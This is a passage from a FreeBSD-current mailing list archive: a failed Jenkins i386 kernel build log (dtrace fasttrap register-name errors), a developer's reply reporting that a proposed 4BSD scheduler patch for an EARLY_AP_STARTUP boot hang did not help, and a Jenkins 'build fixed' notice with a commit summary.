via_verifier.o via_video.o :> export_syms awk -f /usr/src/sys/conf/kmod_syms.awk via.kld export_syms | xargs -J% obj= copy % via.kld --- via.ko.full --- ld -Bshareable -d -warn-common -o via.ko.full via.kld --- via.ko.debug --- objcopy --only-keep-debug via.ko.full via.ko.debug --- via.ko --- objcopy --strip-debug --add-gnu-debuglink=3Dvia.ko.debug via.ko.full via.k= o --- power_if.h --- awk -f /usr/src/sys/tools/makeobjops.awk /usr/src/sys/dev/pccard/power_if.m= -h --- modules-all --- --- all_subdir_dummynet --- =3D=3D=3D> dummynet (all) --- machine --- machine -> /usr/src/sys/i386/include --- x86 --- x86 -> /usr/src/sys/x86/include --- opt_inet6.h --- ln -sf /usr/obj/usr/src/sys/GENERIC/opt_inet6.h opt_inet6.h --- ip_dn_glue.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ip_dn_glue.o -MTip_dn_glue.o -mno-mmx -mno-sse -msoft-float= -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls= -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith = -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_kpr= intf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragma= s -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-parenthe= ses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-error-= shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/sy= s/modules/dummynet/../../netpfil/ipfw/ip_dn_glue.c -o ip_dn_glue.o ctfconvert -L VERSION -g ip_dn_glue.o --- ip_dn_io.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ip_dn_io.o -MTip_dn_io.o -mno-mmx -mno-sse -msoft-float -ff= reestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls -Wn= ested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Win= line -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_kprintf= __ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragmas -W= no-error-tautological-compare -Wno-error-empty-body -Wno-error-parentheses-= equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-error-shif= t-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/sys/mo= dules/dummynet/../../netpfil/ipfw/ip_dn_io.c -o ip_dn_io.o --- all_subdir_drm2 --- ctfconvert -L VERSION -g ttm_page_alloc.o --- ttm_bo_vm.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ttm_bo_vm.o -MTttm_bo_vm.o -mno-mmx -mno-sse -msoft-float -= ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls -= Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -W= inline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_kprin= tf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragmas = -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-parenthese= s-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-error-sh= ift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/sys/= modules/drm2/drm2/../../../dev/drm2/ttm/ttm_bo_vm.c -o ttm_bo_vm.o --- all_subdir_dummynet --- ctfconvert -L VERSION -g ip_dn_io.o --- dn_aqm_codel.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.dn_aqm_codel.o -MTdn_aqm_codel.o -mno-mmx -mno-sse -msoft-f= loat -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-d= ecls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-ar= ith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd= _kprintf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pr= agmas -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-pare= ntheses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-er= ror-shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/sr= c/sys/modules/dummynet/../../netpfil/ipfw/dn_aqm_codel.c -o dn_aqm_codel.o --- all_subdir_dtrace --- ctfconvert -L VERSION -g systrace.o --- all_subdir_drm2 --- ctfconvert -L VERSION -g ttm_bo_vm.o --- ati_pcigart.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ati_pcigart.o -MTati_pcigart.o -mno-mmx -mno-sse -msoft-flo= at -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-dec= ls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arit= h -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_k= printf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-prag= mas -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-parent= heses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-erro= r-shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/= sys/modules/drm2/drm2/../../../dev/drm2/ati_pcigart.c -o ati_pcigart.o --- all_subdir_dtrace --- --- systrace.kld --- ld -d -warn-common -r -d -o systrace.kld systrace.o ctfmerge -L VERSION -g -o systrace.kld systrace.o :> export_syms awk -f /usr/src/sys/conf/kmod_syms.awk systrace.kld export_syms | xargs -J= % objcopy % systrace.kld --- systrace.ko.full --- ld -Bshareable -d -warn-common -o systrace.ko.full systrace.kld --- systrace.ko.debug --- objcopy --only-keep-debug systrace.ko.full systrace.ko.debug --- systrace.ko --- objcopy --strip-debug --add-gnu-debuglink=3Dsystrace.ko.debug systrace.ko.= full systrace.ko --- all_subdir_dtrace/fasttrap --- =3D=3D=3D> dtrace/fasttrap (all) --- machine --- machine -> /usr/src/sys/i386/include --- x86 --- x86 -> /usr/src/sys/x86/include --- opt_compat.h --- ln -sf /usr/obj/usr/src/sys/GENERIC/opt_compat.h opt_compat.h --- vnode_if_newproto.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -p --- vnode_if_typedef.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -q --- vnode_if.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -h --- fasttrap_isa.o --- cc -O2 -pipe -DSMP -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -n= ostdinc -I/usr/src/sys/cddl/compat/opensolaris -I/usr/src/sys/cddl/contrib= /opensolaris/uts/common -I/usr/src/sys -I/usr/src/sys/cddl/contrib/opensola= ris/uts/intel -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GE= NERIC/opt_global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys= /GENERIC -MD -MF.depend.fasttrap_isa.o -MTfasttrap_isa.o -mno-mmx -mno-ss= e -msoft-float -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wr= edundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -W= pointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__= =3D__freebsd_kprintf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wn= o-unknown-pragmas -Wno-error-tautological-compare -Wno-error-empty-body -Wn= o-error-parentheses-equality -Wno-error-unused-function -Wno-error-pointer-= sign -Wno-error-shift-negative-value -Wno-cast-qual -Wno-unused -mno-aes -= mno-avx -std=3Diso9899:1999 -include /usr/src/sys/cddl/compat/opensolaris/= sys/debug_compat.h -c /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrac= e/fasttrap_isa.c -o fasttrap_isa.o --- all_subdir_dummynet --- ctfconvert -L VERSION -g dn_aqm_codel.o --- dn_aqm_pie.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.dn_aqm_pie.o -MTdn_aqm_pie.o -mno-mmx -mno-sse -msoft-float= -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls= -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith = -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_kpr= intf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragma= s -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-parenthe= ses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-error-= shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/sy= s/modules/dummynet/../../netpfil/ipfw/dn_aqm_pie.c -o dn_aqm_pie.o --- all_subdir_drm2 --- ctfconvert -L VERSION -g ati_pcigart.o --- drm_agpsupport.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.drm_agpsupport.o -MTdrm_agpsupport.o -mno-mmx -mno-sse -mso= ft-float -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredunda= nt-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointe= r-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__fre= ebsd_kprintf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknow= n-pragmas -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-= parentheses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wn= o-error-shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /us= r/src/sys/modules/drm2/drm2/../../../dev/drm2/drm_agpsupport.c -o drm_agpsu= pport.o --- all_subdir_dtrace --- /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1105:= 14: error: no member named 'r_r8' in 'struct reg' rp->r_r8); ~~ ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1103:= 38: error: no member named 'r_rdi' in 'struct reg'; did you mean 'r_edi'? dtrace_probe(probe->ftp_id, rp->r_r= di, ^~~= ~~ r_e= di ./x86/reg.h:104:13: note: 'r_edi' declared here __uint32_t r_edi; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1104:= 14: error: no member named 'r_rsi' in 'struct reg'; did you mean 'r_esi'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_esi ./x86/reg.h:105:13: note: 'r_esi' declared here __uint32_t r_esi; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1104:= 25: error: no member named 'r_rdx' in 'struct reg'; did you mean 'r_edx'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_edx ./x86/reg.h:109:13: note: 'r_edx' declared here __uint32_t r_edx; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1104:= 36: error: no member named 'r_rcx' in 'struct reg'; did you mean 'r_ecx'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_ecx ./x86/reg.h:110:13: note: 'r_ecx' declared here __uint32_t r_ecx; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1120:= 14: error: no member named 'r_r8' in 'struct reg' rp->r_r8); ~~ ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1118:= 38: error: no member named 'r_rdi' in 'struct reg'; did you mean 'r_edi'? dtrace_probe(probe->ftp_id, rp->r_r= di, ^~~= ~~ r_e= di ./x86/reg.h:104:13: note: 'r_edi' declared here __uint32_t r_edi; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1119:= 14: error: no member named 'r_rsi' in 'struct reg'; did you mean 'r_esi'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_esi ./x86/reg.h:105:13: note: 'r_esi' declared here __uint32_t r_esi; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1119:= 25: error: no member named 'r_rdx' in 'struct reg'; did you mean 'r_edx'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_edx ./x86/reg.h:109:13: note: 'r_edx' declared here __uint32_t r_edx; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1119:= 36: error: no member named 'r_rcx' in 'struct reg'; did you mean 'r_ecx'? rp->r_rsi, rp->r_rdx, rp->r_rcx= , ^~~~~ r_ecx ./x86/reg.h:110:13: note: 'r_ecx' declared here __uint32_t r_ecx; ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1124:= 6: error: implicit declaration of function 'fasttrap_usdt_args64' is invali= d in C99 [-Werror,-Wimplicit-function-declaration] fasttrap_usdt_args64(probe, rp, ^ /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:1124:= 6: note: did you mean 'fasttrap_usdt_args32'? /usr/src/sys/cddl/contrib/opensolaris/uts/intel/dtrace/fasttrap_isa.c:842:1= : note: 'fasttrap_usdt_args32' declared here fasttrap_usdt_args32(fasttrap_probe_t *probe, struct reg *rp, int argc, ^ 11 errors generated. *** [fasttrap_isa.o] Error code 1 bmake[5]: stopped in /usr/src/sys/modules/dtrace/fasttrap 1 error bmake[5]: stopped in /usr/src/sys/modules/dtrace/fasttrap *** [all_subdir_dtrace/fasttrap] Error code 2 bmake[4]: stopped in /usr/src/sys/modules/dtrace 1 error bmake[4]: stopped in /usr/src/sys/modules/dtrace *** [all_subdir_dtrace] Error code 2 bmake[3]: stopped in /usr/src/sys/modules --- all_subdir_dummynet --- ctfconvert -L VERSION -g dn_aqm_pie.o A failure has been detected in another branch of the parallel make bmake[4]: stopped in /usr/src/sys/modules/dummynet *** [all_subdir_dummynet] Error code 2 bmake[3]: stopped in /usr/src/sys/modules --- all_subdir_drm2 --- ctfconvert -L VERSION -g drm_agpsupport.o A failure has been detected in another branch of the parallel make bmake[5]: stopped in /usr/src/sys/modules/drm2/drm2 *** [all_subdir_drm2/drm2] Error code 2 bmake[4]: stopped in /usr/src/sys/modules/drm2 --- all_subdir_drm2/i915kms --- 2 warnings generated. ctfconvert -L VERSION -g intel_display.o A failure has been detected in another branch of the parallel make bmake[5]: stopped in /usr/src/sys/modules/drm2/i915kms *** [all_subdir_drm2/i915kms] Error code 2 bmake[4]: stopped in /usr/src/sys/modules/drm2 2 errors bmake[4]: stopped in /usr/src/sys/modules/drm2 *** [all_subdir_drm2] Error code 2 bmake[3]: stopped in /usr/src/sys/modules 3 errors bmake[3]: stopped in /usr/src/sys/modules *** [modules-all] Error code 2 bmake[2]: stopped in /usr/obj/usr/src/sys/GENERIC 1 error bmake[2]: stopped in /usr/obj/usr/src/sys/GENERIC *** [buildkernel] Error code 2 bmake[1]: stopped in /usr/src 1 error bmake[1]: stopped in /usr/src *** [buildkernel] Error code 2 make: stopped in /usr/src 1 error make: stopped in /usr/src Build step 'Execute shell' marked build as failure [PostBuildScript] - Execution post build scripts. [FreeBSD_HEAD_i386] $ /bin/sh -xe /tmp/hudson8879968667347411988.sh + export 'PATH=3D/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/b= in' + export 'jname=3DFreeBSD_HEAD_i386' + echo 'clean up jail FreeBSD_HEAD_i386' clean up jail FreeBSD_HEAD_i386 + sudo jail -r FreeBSD_HEAD_i386 + sudo ifconfig igb0 inet6 2610:1c1:1:607c::103:1 -alias + sudo umount FreeBSD_HEAD_i386/usr/src + sudo umount FreeBSD_HEAD_i386/dev + sudo rm -fr FreeBSD_HEAD_i386 + true + sudo chflags -R noschg FreeBSD_HEAD_i386 + sudo rm -fr FreeBSD_HEAD_i386 Email was triggered for: Failure - Any Sending email for trigger: Failure - Any From owner-freebsd-current@freebsd.org Sat Jul 30 07:44:28 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 39044BA82E7 for ; Sat, 30 Jul 2016 07:44:28 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: from mailman.ysv.freebsd.org (unknown [127.0.1.3]) by mx1.freebsd.org (Postfix) with ESMTP id 1694019F9 for ; Sat, 30 Jul 2016 07:44:28 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: by mailman.ysv.freebsd.org (Postfix) id 12451BA82E0; Sat, 30 Jul 2016 07:44:28 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0FA6BBA82D8 for ; Sat, 30 Jul 2016 07:44:28 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: from mail-wm0-x244.google.com (mail-wm0-x244.google.com [IPv6:2a00:1450:400c:c09::244]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 8CABF19F8; Sat, 30 Jul 2016 07:44:27 +0000 (UTC) (envelope-from gljennjohn@gmail.com) Received: by mail-wm0-x244.google.com with SMTP id x83so18598673wma.3; Sat, 30 Jul 2016 00:44:27 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:in-reply-to:references:reply-to :mime-version:content-transfer-encoding; bh=GEI435x9zVHlnmSVo3pTVjJ2ty4hRZ+UvsWhUuQXD0A=; b=pxHnsRkXS+QyPE7PEs9YC3ZT91QxZnYProwQSsOurm27ywx7eQhVdI8nJcgBua25M7 j2fsAszz+sSS0GQj0rV5n6IwzPY1Q/1pkzGuwl4REsGfB0AR9+uWFUkxgRwynGPpPk3y WGApZ53cuLZzyUAOI5+hdLLGsoEcTgr+8n54uN2QYjAWRKRnI4V98cSYsufrcGZE8S4n TVBpcw7DlJttD3svMPHqM2pjgC5O05vnt+y3GW7YNNX7U4iKoWY66jSgKXEhefBjC0/q OQhtKwyU88qk0Sg+Gp7IAFumW1u4svWxv/KT2MJsQ56nbjx3BlCK5YOU7g5vY8qkxP4L cRTQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:in-reply-to :references:reply-to:mime-version:content-transfer-encoding; bh=GEI435x9zVHlnmSVo3pTVjJ2ty4hRZ+UvsWhUuQXD0A=; b=ROk1eThPf3FR7RNYFii4ddyDkLLmWfBW9YDdBZixx6fFzqkz2K+mL3IgVpcvoybJMA oJEE1LuYkihmFgjVzWjesnZYxvKeZRJGEKn6iz/jQP8S5+wFQ8pFO65lzC3IktARadfL sKRJsXEU9gOYWpuStwHxjVJW4VG//mpFt6iB5oPa95otcaiB/Jqs8CbAyElpPFI5AC5F 7orH8LZ2ygtNQxY9527gSUlIqg7qQVThHn8BWlSSdXhRR3+BBuPksw5HilUb5weRbKu3 Px/0+5J9a9/loW69Mn8kDLbmupVMowgcijLNQB6THSNR/lHxpdTSrDA80Lmm52jdRbet /0QA== X-Gm-Message-State: AEkoouud/JYz2bSYP+SDMNuSOdk7/9JPf07/LBPIpzxSv7i/CygCI7Z1RCIW0S/J6Vh46g== X-Received: by 10.28.98.135 with SMTP id w129mr46284040wmb.38.1469864665149; Sat, 30 Jul 2016 00:44:25 -0700 (PDT) Received: from ernst.home (p4FCA79BE.dip0.t-ipconnect.de. [79.202.121.190]) by smtp.gmail.com with ESMTPSA id v203sm6556826wmv.2.2016.07.30.00.44.23 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Sat, 30 Jul 2016 00:44:24 -0700 (PDT) Date: Sat, 30 Jul 2016 09:44:22 +0200 From: Gary Jennejohn To: John Baldwin Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Message-ID: <20160730094422.68e1b8db@ernst.home> In-Reply-To: <2732687.Cf9hD9SkSs@ralph.baldwin.cx> References: <20160516122242.39249a54@ernst.home> <1758017.P1iqL9uSnF@ralph.baldwin.cx> <20160728003131.1f67bb78@ernst.home> <2732687.Cf9hD9SkSs@ralph.baldwin.cx> Reply-To: gljennjohn@gmail.com X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 07:44:28 -0000 On Fri, 29 Jul 2016 13:17:42 -0700 John Baldwin wrote: > On Thursday, July 28, 2016 12:31:31 AM Gary Jennejohn wrote: > > Well, now I know that ULE is a prerequiste for EARLY_AP_STARTUP! I > > wasn't aware of that. I prefer BSD and that's the scheduler I did > > the first tests with. > > > > But with the ULE scheduler the system comes up all the way. > > > > It would be nice if the BSD scheduler could also be modified to > > work with EARLY_AP_STARTUP. > > I wasn't able to reproduce your hang with 4BSD, but I think I see a > possible problem. Try this: > > diff --git a/sys/kern/sched_4bsd.c b/sys/kern/sched_4bsd.c > index 7de56b6..d53331a 100644 > --- a/sys/kern/sched_4bsd.c > +++ b/sys/kern/sched_4bsd.c > @@ -327,7 +327,6 @@ maybe_preempt(struct thread *td) > * - The current thread has a higher (numerically lower) or > * equivalent priority. Note that this prevents curthread from > * trying to preempt to itself. > - * - It is too early in the boot for context switches (cold is set). > * - The current thread has an inhibitor set or is in the process of > * exiting. In this case, the current thread is about to switch > * out anyways, so there's no point in preempting. If we did, > @@ -348,7 +347,7 @@ maybe_preempt(struct thread *td) > ("maybe_preempt: trying to run inhibited thread")); > pri = td->td_priority; > cpri = ctd->td_priority; > - if (panicstr != NULL || pri >= cpri || cold /* || dumping */ || > + if (panicstr != NULL || pri >= cpri /* || dumping */ || > TD_IS_INHIBITED(ctd)) > return (0); > #ifndef FULL_PREEMPTION > @@ -1127,7 +1126,7 @@ forward_wakeup(int cpunum) > if ((!forward_wakeup_enabled) || > (forward_wakeup_use_mask == 0 && forward_wakeup_use_loop == 0)) > return (0); > - if (!smp_started || cold || panicstr) > + if (!smp_started || panicstr) > return (0); > > forward_wakeups_requested++; > Thanks, but with this patch the kernel hangs in exactly the same place as before - after the HPET output. Maybe I'm missing some kernel option which ULE works around, or something like that. -- Gary Jennejohn From owner-freebsd-current@freebsd.org Sat Jul 30 08:23:28 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 63637BA8D54; Sat, 30 Jul 2016 08:23:28 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 515A91B34; Sat, 30 Jul 2016 08:23:28 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 6FE351A6; Sat, 30 Jul 2016 08:23:28 +0000 (UTC) Date: Sat, 30 Jul 2016 08:23:25 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: markj@FreeBSD.org, araujo@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org, freebsd-i386@FreeBSD.org Message-ID: <2103605303.66.1469867008467.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <265214000.62.1469859343703.JavaMail.jenkins@jenkins-9.freebsd.org> References: <265214000.62.1469859343703.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_i386 - Build #3723 - Fixed MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_i386 X-Jenkins-Result: SUCCESS Precedence: bulk Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 08:23:28 -0000 FreeBSD_HEAD_i386 - Build #3723 - Fixed: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3723/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3723/changes Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3723/console Change summaries: 303545 by araujo: Use nitems() from sys/param.h. MFC after: 2 weeks. Sponsored by: gandi.net (BSD Day Taiwan) 303544 by markj: Restore an ifdef that should not have been removed in r303535. X-MFC-With: r303535 303543 by araujo: Use nitems() from sys/param.h. MFC after: 2 weeks. Sponsored by: gandi.net (BSD Day Taiwan) 303542 by araujo: Use nitems() from sys/param.h. MFC after: 2 weeks. Sponsored by: gandi.net (BSD Day Taiwan) 303541 by araujo: Use nitems() from sys/param.h. Sponsored by: gandi.net (BSD Day Taiwan) MFC after: 2 weeks. 303540 by araujo: Use nitems() from sys/param.h Sponsored by: gandi.net (BSD Day Taiwan) 303539 by araujo: Use nitems() from sys/param.h. Sponsored by: gandi.net (BSD Day Taiwan) From owner-freebsd-current@freebsd.org Sat Jul 30 09:12:33 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D5364BA982B for ; Sat, 30 Jul 2016 09:12:33 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id C79DB1201; Sat, 30 Jul 2016 09:12:33 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id F29961A8; Sat, 30 Jul 2016 09:12:33 +0000 (UTC) Date: Sat, 30 Jul 2016 09:12:33 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1413790308.67.1469869953900.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1232028214.60.1469850606012.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1232028214.60.1469850606012.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is unstable: FreeBSD_HEAD #504 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: 